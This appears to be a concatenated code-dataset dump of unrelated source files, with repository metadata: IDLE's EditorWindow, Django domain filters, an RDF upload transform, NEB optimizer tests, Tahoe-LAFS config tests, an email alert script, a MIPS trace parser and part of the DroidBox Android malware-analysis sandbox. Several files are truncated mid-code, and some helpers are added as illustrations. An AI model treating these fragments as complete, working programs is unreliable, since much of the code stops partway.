:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT,signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
|
qedsoftware/commcare-hq
|
corehq/apps/dump_reload/sql/filters.py
|
Python
|
bsd-3-clause
| 1,812
| 0.002208
|
from abc import ABCMeta, abstractmethod
import six
from django.db.models import Q
from dimagi.utils.chunked import chunked
class DomainFilter(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_filters(self, domain_name):
"""Return a list of filters. Each filter will be applied to a queryset independently
of the others."""
raise NotImplementedError()
class SimpleFilter(DomainFilter):
def __init__(self, filter_kwarg):
self.filter_kwarg = filter_kwarg
def get_filters(self, domain_name):
return [Q(**{self.filter_kwarg: domain_name})]
class UsernameFilter(DomainFilter):
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 500 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_usernames_by_domain
        usernames = get_all_usernames_by_domain(domain_name)
for chunk in chunked(usernames, 500):
filter = Q()
for username in chunk:
filter |= Q(username__iexact=username)
yield filter
class UserIDFilter(DomainFilter):
def __init__(self, user_id_field, include_web_users=True):
self.user_id_field = user_id_field
self.include_web_users = include_web_users
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 1000 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_user_ids_by_domain
user_ids = get_all_user_ids_by_domain(domain_name, include_web_users=self.include_web_users)
for chunk in chunked(user_ids, 1000):
query_kwarg = '{}__in'.format(self.user_id_field)
yield Q(**{query_kwarg: chunk})
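# --- Illustrative helper (not part of the original module) ---
# Shows how the filters above are meant to be consumed: each Q object returned
# by get_filters() is applied to a queryset independently of the others.
# `model_cls` stands in for whatever Django model the dump code iterates over.
def iter_filtered_querysets(model_cls, domain_filter, domain_name):
    for q in domain_filter.get_filters(domain_name):
        yield model_cls.objects.filter(q)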
|
ox-it/humfrey
|
humfrey/update/transform/upload.py
|
Python
|
bsd-3-clause
| 2,982
| 0.001341
|
from __future__ import with_statement
import datetime
import logging
import pytz
import rdflib
from django.conf import settings
from humfrey.update.transform.base import Transform
from humfrey.update.uploader import Uploader
from humfrey.sparql.endpoint import Endpoint
from humfrey.utils.namespaces import NS
logger = logging.getLogger(__name__)
class Upload(Transform):
formats = {
'rdf': 'xml',
'n3': 'n3',
'ttl': 'n3',
'nt': 'nt',
}
created_query = """
SELECT ?date WHERE {
GRAPH %(graph)s {
%(graph)s dcterms:created ?date
}
}
"""
site_timezone = pytz.timezone(settings.TIME_ZONE)
def __init__(self, graph_name, method='PUT'):
self.graph_name = rdflib.URIRef(graph_name)
self.method = method
def execute(self, transform_manager, input):
transform_manager.start(self, [input])
        logger.debug("Starting upload of %r", input)
        extension = input.rsplit('.', 1)[-1]
try:
serializer = self.formats[extension]
except KeyError:
logger.exception("Unrecognized RDF extension: %r", extension)
raise
graph = rdflib.ConjunctiveGraph()
graph.parse(open(input, 'r'),
format=serializer,
publicID=self.graph_name)
logger.debug("Parsed graph")
datetime_now = self.site_timezone.localize(datetime.datetime.now().replace(microsecond=0))
modified = graph.value(self.graph_name, NS['dcterms'].modified,
default=rdflib.Literal(datetime_now))
created = graph.value(self.graph_name, NS['dcterms'].created)
if not created:
logger.debug("Getting created date from %r", transform_manager.store.query_endpoint)
endpoint = Endpoint(transform_manager.store.query_endpoint)
results = list(endpoint.query(self.created_query % {'graph': self.graph_name.n3()}))
if results:
created = results[0].date
else:
created = modified
graph += (
(self.graph_name, NS.rdf.type, NS.sd.Graph),
(self.graph_name, NS.dcterms.modified, modified),
(self.graph_name, NS.dcterms.created, created),
)
logger.debug("About to serialize")
output = transform_manager('rdf')
with open(output, 'w') as f:
graph.serialize(f)
logger.debug("Serialization done; about to upload")
uploader = Uploader()
uploader.upload(stores=(transform_manager.store,),
graph_name=self.graph_name,
filename=output,
method=self.method,
mimetype='application/rdf+xml')
logger.debug("Upload complete")
transform_manager.end([self.graph_name])
transform_manager.touched_graph(self.graph_name)
|
eljost/pysisyphus
|
tests_staging/test_mullerbrownpot.py
|
Python
|
gpl-3.0
| 6,681
| 0.002994
|
#!/usr/bin/env python3
import copy
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.calculators.MullerBrownPot import MullerBrownPot
#from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.BFGS import BFGS
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.Geometry import Geometry
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
KWARGS = {
"images": 4,
"max_cycles": 100,
"max_step": 0.02,
"convergence": {
"max_force_thresh": 0.1,
"rms_force_thresh": 0.02,
"max_step_thresh": 0.005,
"rms_step_thresh": 0.001,
},
"dump": False,
}
def get_geoms(keys=("B","C","TSA","A")):
coords_dict = {
"A": (-0.558, 1.442, 0), # Minimum A
"B": (0.6215, 0.02838, 0), # Minimum B
"C": (-0.05, 0.467, 0), # Minimum C
"AC": (-0.57, 0.8, 0), # Between A and C
"TSA": (-0.822, 0.624, 0) # Saddle point A
}
coords = [np.array(coords_dict[k]) for k in keys]
atoms = ("H")
geoms = [Geometry(atoms, c) for c in coords]
return geoms
def run_cos_opt(cos, Opt, images, **kwargs):
cos.interpolate(images)
opt = Opt(cos, **kwargs)
for img in cos.images:
img.set_calculator(MullerBrownPot())
opt.run()
return opt
def animate(opt):
xlim = (-1.75, 1.25)
ylim = (-0.5, 2.25)
levels=(-150, -15, 40)
ap = AnimPlot(MullerBrownPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
@pytest.mark.sd
def test_steepest_descent_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 4
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 56)
return opt
@pytest.mark.sd
def test_steepest_descent_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_cycles"] = 100
convergence = {
"max_force_thresh": 1.16,
"rms_force_thresh": 0.27,
"max_step_thresh": 0.021,
"rms_step_thresh": 0.005,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 62)
return opt
@pytest.mark.bfgs
def test_bfgs_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"max_force_thresh": 5.0,
"rms_force_thresh": 1,
"max_step_thresh": 0.002,
"rms_step_thresh": 0.0006,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, BFGS, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 45)
return opt
@pytest.mark.lbfgs
def test_lbfgs_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 3
kwargs["fix_ends"] = True
k_min = 1000
k_max = k_min+10
neb = NEB(get_geoms(("A", "B")), k_min=k_min, k_max=k_max, fix_ends=True)
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
# from pysisyphus.optimizers.LBFGS_mod import LBFGS
opt = run_cos_opt(neb, LBFGS, **kwargs)
# assert(opt.is_converged)
# assert(opt.cur_cycle == 45)
return opt
@pytest.mark.sd
def test_steepest_descent_neb_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"max_force_thresh": 0.6,
"rms_force_thresh": 0.13,
"max_step_thresh": 0.015,
"rms_step_thresh": 0.0033,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 41)
return opt
@pytest.mark.fire
def test_fire_neb():
kwargs = copy.copy(KWARGS)
kwargs["dt"] = 0.01
kwargs["dt_max"] = 0.1
neb = NEB(get_geoms())
opt = run_cos_opt(neb, FIRE, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 76)
return opt
def test_equal_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 17)
return opt
def test_equal_szts_straight():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_step"] = 0.04
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(("A", "B")), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
return opt
def test_equal_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 21)
return opt
def test_energy_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.8,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 15)
return opt
def test_energy_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"rms_force_thresh": 1.7,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 22)
return opt
if __name__ == "__main__":
# Steepest Descent
opt = test_steepest_descent_neb()
#opt = test_steepest_descent_straight_neb()
#opt = test_steepest_descent_neb_more_images()
# opt = test_bfgs_straight_neb()
# opt = test_lbfgs_neb()
# FIRE
#opt = test_fire_neb()
# SimpleZTS
#opt = test_equal_szts()
#opt = test_equal_szts_straight()
#opt = test_equal_szts_more_images()
#opt = test_energy_szts()
#opt = test_energy_szts_more_images()
ap = animate(opt)
plt.show()
|
amicojeko/YouCantTouchThis
|
sendemail.py
|
Python
|
gpl-3.0
| 2,259
| 0.009296
|
# coding=utf-8
# Copyright (C) 2014 Stefano Guglielmetti
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import smtplib, os, sys
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
#From address, to address, subject and message body
from_address = 'EMAIL_FROM_ADDRESS'
to_address = ['EMAIL_TO_ADDRESS']
email_subject = 'Alert!!! Zombies!!! Ahead!!!'
email_body = 'An intruder has been detected and needs to be eliminated!'
# Credentials (if needed)
username = 'YOUR_EMAIL_USERNAME'
password = 'YOUR_EMAIL_PASSWORD'
# The actual mail send
server = 'smtp.gmail.com:587'
def send_mail(send_from, send_to, subject, text, files=[], server="localhost"):
assert type(send_to)==list
    assert type(files)==list
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText(text) )
for f in files:
part = MIMEBase('application', "octet-stream")
part.set_payload( open(f,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
msg.attach(part)
smtp = smtplib.SMTP(server)
smtp.starttls()
smtp.login(username,password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
send_mail(from_address, to_address, email_subject, email_body, [sys.argv[1]], server) #the first command line argument will be used as the image file name
|
david415/tahoe-lafs
|
src/allmydata/test/test_configutil.py
|
Python
|
gpl-2.0
| 3,451
| 0.00058
|
import os.path
from twisted.trial import unittest
from allmydata.util import configutil
from allmydata.test.no_network import GridTestMixin
from ..scripts import create_node
from .. import client
class ConfigUtilTests(GridTestMixin, unittest.TestCase):
def test_config_utils(self):
        self.basedir = "cli/ConfigUtilTests/test-config-utils"
self.set_up_grid(oneshare=True)
tahoe_cfg = os.path.join(self.get_clientdir(i=0), "tahoe.cfg")
# test that at least one option was read correctly
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "client-0")
# test that set_config can mutate an existing option
configutil.set_config(config, "node", "nickname", "Alice!")
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "Alice!")
# test that set_config can set a new option
descriptor = "Twas brillig, and the slithy toves Did gyre and gimble in the wabe"
configutil.set_config(config, "node", "descriptor", descriptor)
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "descriptor"), descriptor)
def test_config_validation_success(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n')
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config, dict(node=['valid']))
def test_config_validation_invalid_item(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\ninvalid = foo\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("section [node] contains unknown option 'invalid'", str(e))
def test_config_validation_invalid_section(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n[invalid]\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("contains unknown section [invalid]", str(e))
def test_create_client_config(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
opts = {"nickname": "nick",
"webport": "tcp:3456",
"hide-ip": False,
"listen": "none",
}
create_node.write_node_config(f, opts)
create_node.write_client_config(f, opts)
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config,
client._valid_config_sections())
|
ianyh/heroku-buildpack-python-opencv
|
vendor/.heroku/lib/python2.7/idlelib/EditorWindow.py
|
Python
|
mit
| 66,031
| 0.001817
|
import sys
import os
import re
import imp
from Tkinter import *
import tkSimpleDialog
import tkMessageBox
import webbrowser
from idlelib.MultiCall import MultiCallCreator
from idlelib import idlever
from idlelib import WindowList
from idlelib import SearchDialog
from idlelib import GrepDialog
from idlelib import ReplaceDialog
from idlelib import PyParse
from idlelib.configHandler import idleConf
from idlelib import aboutDialog, textView, configDialog
from idlelib import macosxSupport
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
if micro:
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
def _find_module(fullname, path=None):
"""Version of imp.find_module() that handles hierarchical module names"""
file = None
for tgt in fullname.split('.'):
if file is not None:
file.close() # close intermediate files
(file, filename, descr) = imp.find_module(tgt, path)
if descr[2] == imp.PY_SOURCE:
break # find but not load the source file
module = imp.load_module(tgt, file, filename, descr)
try:
path = module.__path__
except AttributeError:
raise ImportError, 'No source for module ' + module.__name__
if descr[2] != imp.PY_SOURCE:
        # If all of the above fails and didn't raise an exception, fall back
# to a straight import which can find __init__.py in a package.
m = __import__(fullname)
try:
filename = m.__file__
except AttributeError:
pass
else:
file = None
base, ext = os.path.splitext(filename)
if ext == '.pyc':
ext = '.py'
filename = base + ext
descr = filename, None, imp.PY_SOURCE
return file, filename, descr
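# Illustrative sketch, not part of the original idlelib module: how
# _find_module() resolves a dotted (hierarchical) name.  The module name below
# is only an example; any importable hierarchical name would do.
def _example_find_module():
    file, filename, descr = _find_module('idlelib.PyParse')
    if file is not None:
        file.close()
    return filename, descr[2] == imp.PY_SOURCE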
class HelpDialog(object):
def __init__(self):
self.parent = None # parent of help window
        self.dlg = None # the help window itself
def display(self, parent, near=None):
""" Display the help dialog.
parent - parent widget for the help window
near - a Toplevel widget (e.g. EditorWindow or PyShell)
to use as a reference for placing the help window
"""
if self.dlg is None:
self.show_dialog(parent)
if near:
self.nearwindow(near)
def show_dialog(self, parent):
self.parent = parent
fn=os.path.join(os.path.abspath(os.path.dirname(__file__)),'help.txt')
self.dlg = dlg = textView.view_file(parent,'Help',fn, modal=False)
dlg.bind('<Destroy>', self.destroy, '+')
def nearwindow(self, near):
# Place the help dialog near the window specified by parent.
# Note - this may not reposition the window in Metacity
# if "/apps/metacity/general/disable_workarounds" is enabled
dlg = self.dlg
geom = (near.winfo_rootx() + 10, near.winfo_rooty() + 10)
dlg.withdraw()
dlg.geometry("=+%d+%d" % geom)
dlg.deiconify()
dlg.lift()
def destroy(self, ev=None):
self.dlg = None
self.parent = None
helpDialog = HelpDialog() # singleton instance
class EditorWindow(object):
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.IOBinding import IOBinding, filesystemencoding, encoding
from idlelib import Bindings
from Tkinter import Toplevel
from idlelib.MultiStatusBar import MultiStatusBar
help_url = None
def __init__(self, flist=None, filename=None, key=None, root=None):
if EditorWindow.help_url is None:
dochome = os.path.join(sys.prefix, 'Doc', 'index.html')
if sys.platform.count('linux'):
# look for html docs in a couple of standard places
pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
if os.path.isdir('/var/www/html/python/'): # "python2" rpm
dochome = '/var/www/html/python/index.html'
else:
basepath = '/usr/share/doc/' # standard location
dochome = os.path.join(basepath, pyver,
'Doc', 'index.html')
elif sys.platform[:3] == 'win':
chmfile = os.path.join(sys.prefix, 'Doc',
'Python%s.chm' % _sphinx_version())
if os.path.isfile(chmfile):
dochome = chmfile
elif macosxSupport.runningAsOSXApp():
                # documentation is stored inside the python framework
                dochome = os.path.join(sys.prefix,
                        'Resources/English.lproj/Documentation/index.html')
dochome = os.path.normpath(dochome)
if os.path.isfile(dochome):
EditorWindow.help_url = dochome
if sys.platform == 'darwin':
# Safari requires real file:-URLs
EditorWindow.help_url = 'file://' + EditorWindow.help_url
else:
EditorWindow.help_url = "http://docs.python.org/%d.%d" % sys.version_info[:2]
currentTheme=idleConf.CurrentTheme()
self.flist = flist
root = root or flist.root
self.root = root
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
self.menubar = Menu(root)
self.top = top = WindowList.ListedToplevel(root, menu=self.menubar)
if flist:
self.tkinter_vars = flist.vars
#self.top.instance_dict makes flist.inversedict available to
#configDialog.py so it can access all EditorWindow instances
self.top.instance_dict = flist.inversedict
else:
self.tkinter_vars = {} # keys: Tkinter event names
# values: Tkinter variable instances
self.top.instance_dict = {}
self.recent_files_path = os.path.join(idleConf.GetUserCfgDir(),
'recent-files.lst')
self.text_frame = text_frame = Frame(top)
self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.width = idleConf.GetOption('main','EditorWindow','width', type='int')
text_options = {
'name': 'text',
'padx': 5,
'wrap': 'none',
'width': self.width,
'height': idleConf.GetOption('main', 'EditorWindow', 'height', type='int')}
if TkVersion >= 8.5:
# Starting with tk 8.5 we have to set the new tabstyle option
# to 'wordprocessor' to achieve the same display of tabs as in
# older tk versions.
text_options['tabstyle'] = 'wordprocessor'
self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
self.top.focused_widget = self.text
self.createmenubar()
self.apply_bindings()
self.top.protocol("WM_DELETE_WINDOW", self.close)
self.top.bind("<<close-window>>", self.close_event)
if macosxSupport.runningAsOSXApp():
# Command-W on editorwindows doesn't work without this.
text.bind('<<close-window>>', self.close_event)
# Some OS X systems have only one mouse button,
# so use control-click for pulldown menus there.
# (Note, AquaTk defines <2> as the right button if
# present and the Tk Text widget already binds <2>.)
text.bind("<Control-Button-1>",self.right_menu_event)
else:
# Elsewhere, use right-click for pulldown menus.
text.bind("
|
robinandeer/chanjo
|
tests/test_calculate.py
|
Python
|
mit
| 2,295
| 0
|
"""Test calculate module"""
from chanjo.store.models import Sample
def test_mean(populated_db):
"""Test for calculating mean coverage"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics
query = populated_db.mean()
# THEN the results should group over 2 "rows"
results = query.all()
assert len(results) == 2
sample_ids = set(result[0] for result in results)
assert sample_ids == set(['sample', 'sample2']) # sample id
result = results[0]
for metric in filter(None, result[1:]):
assert isinstance(metric, float)
def test_mean_with_samples(populated_db):
    """Test for calculating mean with samples"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics for a particular sample
sample_id = 'sample'
query = populated_db.mean(sample_ids=[sample_id])
    # THEN the results should be limited to that sample
results = query.all()
assert len(results) == 1
result = results[0]
assert result[0] == sample_id
def test_gene(populated_db):
"""Test for calculating gene metrics"""
# GIVEN a database populated with a single sample
assert Sample.query.count() == 2
# WHEN calculating average metrics for a gene
gene_id = 28706
query = populated_db.gene_metrics(gene_id)
|
# THEN the results should add up to a single row
results = query.all()
assert len(results) == 2
result = results[0]
assert result[0] == 'sample'
assert result[-1] == gene_id
def test_sample_coverage(populated_db):
"""Test for OMIM coverage"""
# GIVEN a database populated with two samples
assert Sample.query.count() == 2
sample_ids = ('sample', 'sample2')
gene_ids = (14825, 28706)
# WHEN calculating coverage for sample 'sample' on gene 14825
query = populated_db.sample_coverage(sample_ids=sample_ids, genes=gene_ids)
# THEN query should be a dict with samples as keys, where each sample
# is a dict with keys mean_coverage and mean completeness
assert set(query.keys()) == set(sample_ids)
for _, value in query.items():
assert set(value.keys()) == set(['mean_coverage', 'mean_completeness'])
|
sergev/vak-opensource
|
languages/python/simtrace.py
|
Python
|
apache-2.0
| 3,176
| 0.007557
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
#
# Print the sequence of function calls from the Imperas trace file.
#
import sys, string, subprocess, bisect
if len(sys.argv) != 3:
print "Usage: simtrace file.trace vmunix.elf"
sys.exit (1)
# Extract the list of symbols from the binary executable.
nm_command = subprocess.Popen ("nm "+sys.argv[2], shell = True, stdout = subprocess.PIPE)
table = {}
max_addr = 0
for line in nm_command.stdout.readlines():
word = line.split()
addr = int(word[0], 16)
func = word[2]
table[addr] = func
if addr > max_addr:
max_addr = addr
#print "%08x = %s" % (addr, func)
table_keys = sorted(table.keys())
#print table_keys
# Find a name of the function for the given address.
# Return the name and the offset.
def find_function (addr):
if addr <= max_addr:
i = bisect.bisect_right(table_keys, addr)
if i > 0:
last = table_keys[i-1]
return (table[last], addr - last)
return ("", 0)
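# Illustrative sketch, not part of the original script: resolving an address
# that falls a few bytes into a known function.  The address constant is made
# up for the example; real addresses come from the trace processed below.
def example_find_function(addr=0x80001008):
    (func, offset) = find_function(addr)
    return "%s + %u" % (func, offset)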
# Print a function name for the given address.
last_func = ""
def process_instruction(addr, level):
#print "--- process_instruction(%#x)" % addr
global last_func
(func, offset) = find_function (addr)
if func != last_func:
if offset == 0:
print "%08x : %*s%s" % (addr, level*2, "", func)
else:
print "%08x : %*s%s + %u" % (addr, level*2, "", func, offset)
last_func = func
# Check whether the string is a hex number
hex_digits = set(string.hexdigits)
def is_hex(s):
return all(c in hex_digits for c in s)
# Read the trace file.
trace_file = open (sys.argv[1])
pc = 0
op = ""
last_op = ""
level = 0
for line in trace_file.readlines():
word = line.split()
if len(word) > 0 and word[0] == "---":
        if pc > max_addr and len(word) == 6 and \
            word[1] == "I/O" and \
            word[2] == "Read" and word[5] == "U4STA":
# Skip bootloader timeout
continue
# Print i/o events.
print line.strip()
continue
if len(word) > 1 and word[0] == "Info" and word[1] == "(MIPS32_EXCEPT)":
# Print exceptions.
print "---", string.join(word[3:])
continue
if len(word) < 7:
continue
va = word[2]
pa = word[3]
cca = word[4]
if not (word[1] == ":" and
len(va) == 8 and len(pa) == 8 and
is_hex(va) and is_hex(pa)):
continue
pc = int(va, 16)
# Skip bootloader region.
if pc > max_addr:
continue
if cca != "2:" and cca != "3:":
print "Warning: unexpected CCA value!"
if last_op == "JAL":
level = level + 1
elif last_op == "JR":
level = level - 1
#print pc, ":", string.join(word[6:])
process_instruction(pc, level)
# Keep the history of two last instructions
last_op = op
op = word[6]
if word[6] == "JAL" or word[6] == "JALR":
op = "JAL"
elif (word[6] == "JR" or word[6] == "JR.HB") and word[7] == "$31":
op = "JR"
else:
op = ""
# Print the last executed address.
if pc != 0:
last_func = ""
print "=== Stopped at: ==="
process_instruction(pc, 0)
|
nastya/droidbot
|
droidbox_scripts/droidbox_compatible.py
|
Python
|
mit
| 24,119
| 0.006468
|
# I have to modify droidbox scripts to let it work with droidbot
# This is a compatible version which generate a report with the same format of original DroidBox
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Dynamically analyze Android applications
This script allows you to dynamically analyze Android applications.
It installs, runs, and analyzes Android applications.
At the end of each analysis, it outputs the Android application's characteristics in JSON.
Please keep in mind that all data received/sent,
read/written are shown in hexadecimal since the handled data can contain binary data.
"""
import json, time, signal, os, sys
import zipfile
import subprocess
import threading
from threading import Thread
from xml.dom import minidom
from subprocess import call, PIPE, Popen
from utils import AXMLPrinter
import hashlib
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
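# Illustrative sketch, not part of the original DroidBox code: a taint tag in
# the log is a bitmask, so the readable names can be recovered by testing each
# bit against the `tags` table above.  The sample value is made up
# (0x402 == TAINT_IMEI | TAINT_CONTACTS).
def example_decode_taint(tag_value=0x402):
    return [name for bit, name in tags.items() if tag_value & bit]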
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, output_dir=None):
self.sendsms = {}
self.phonecalls = {}
self.cryptousage = {}
self.dexclass = {}
self.dataleaks = {}
self.opennet = {}
self.sendnet = {}
self.recvnet = {}
self.closenet = {}
self.fdaccess = {}
self.servicestart = {}
self.accessedfiles = {}
self.enabled = True
self.adb = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
            # Possibility that no output files are generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
        # No main activity found? Return an error
if main_activity == None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
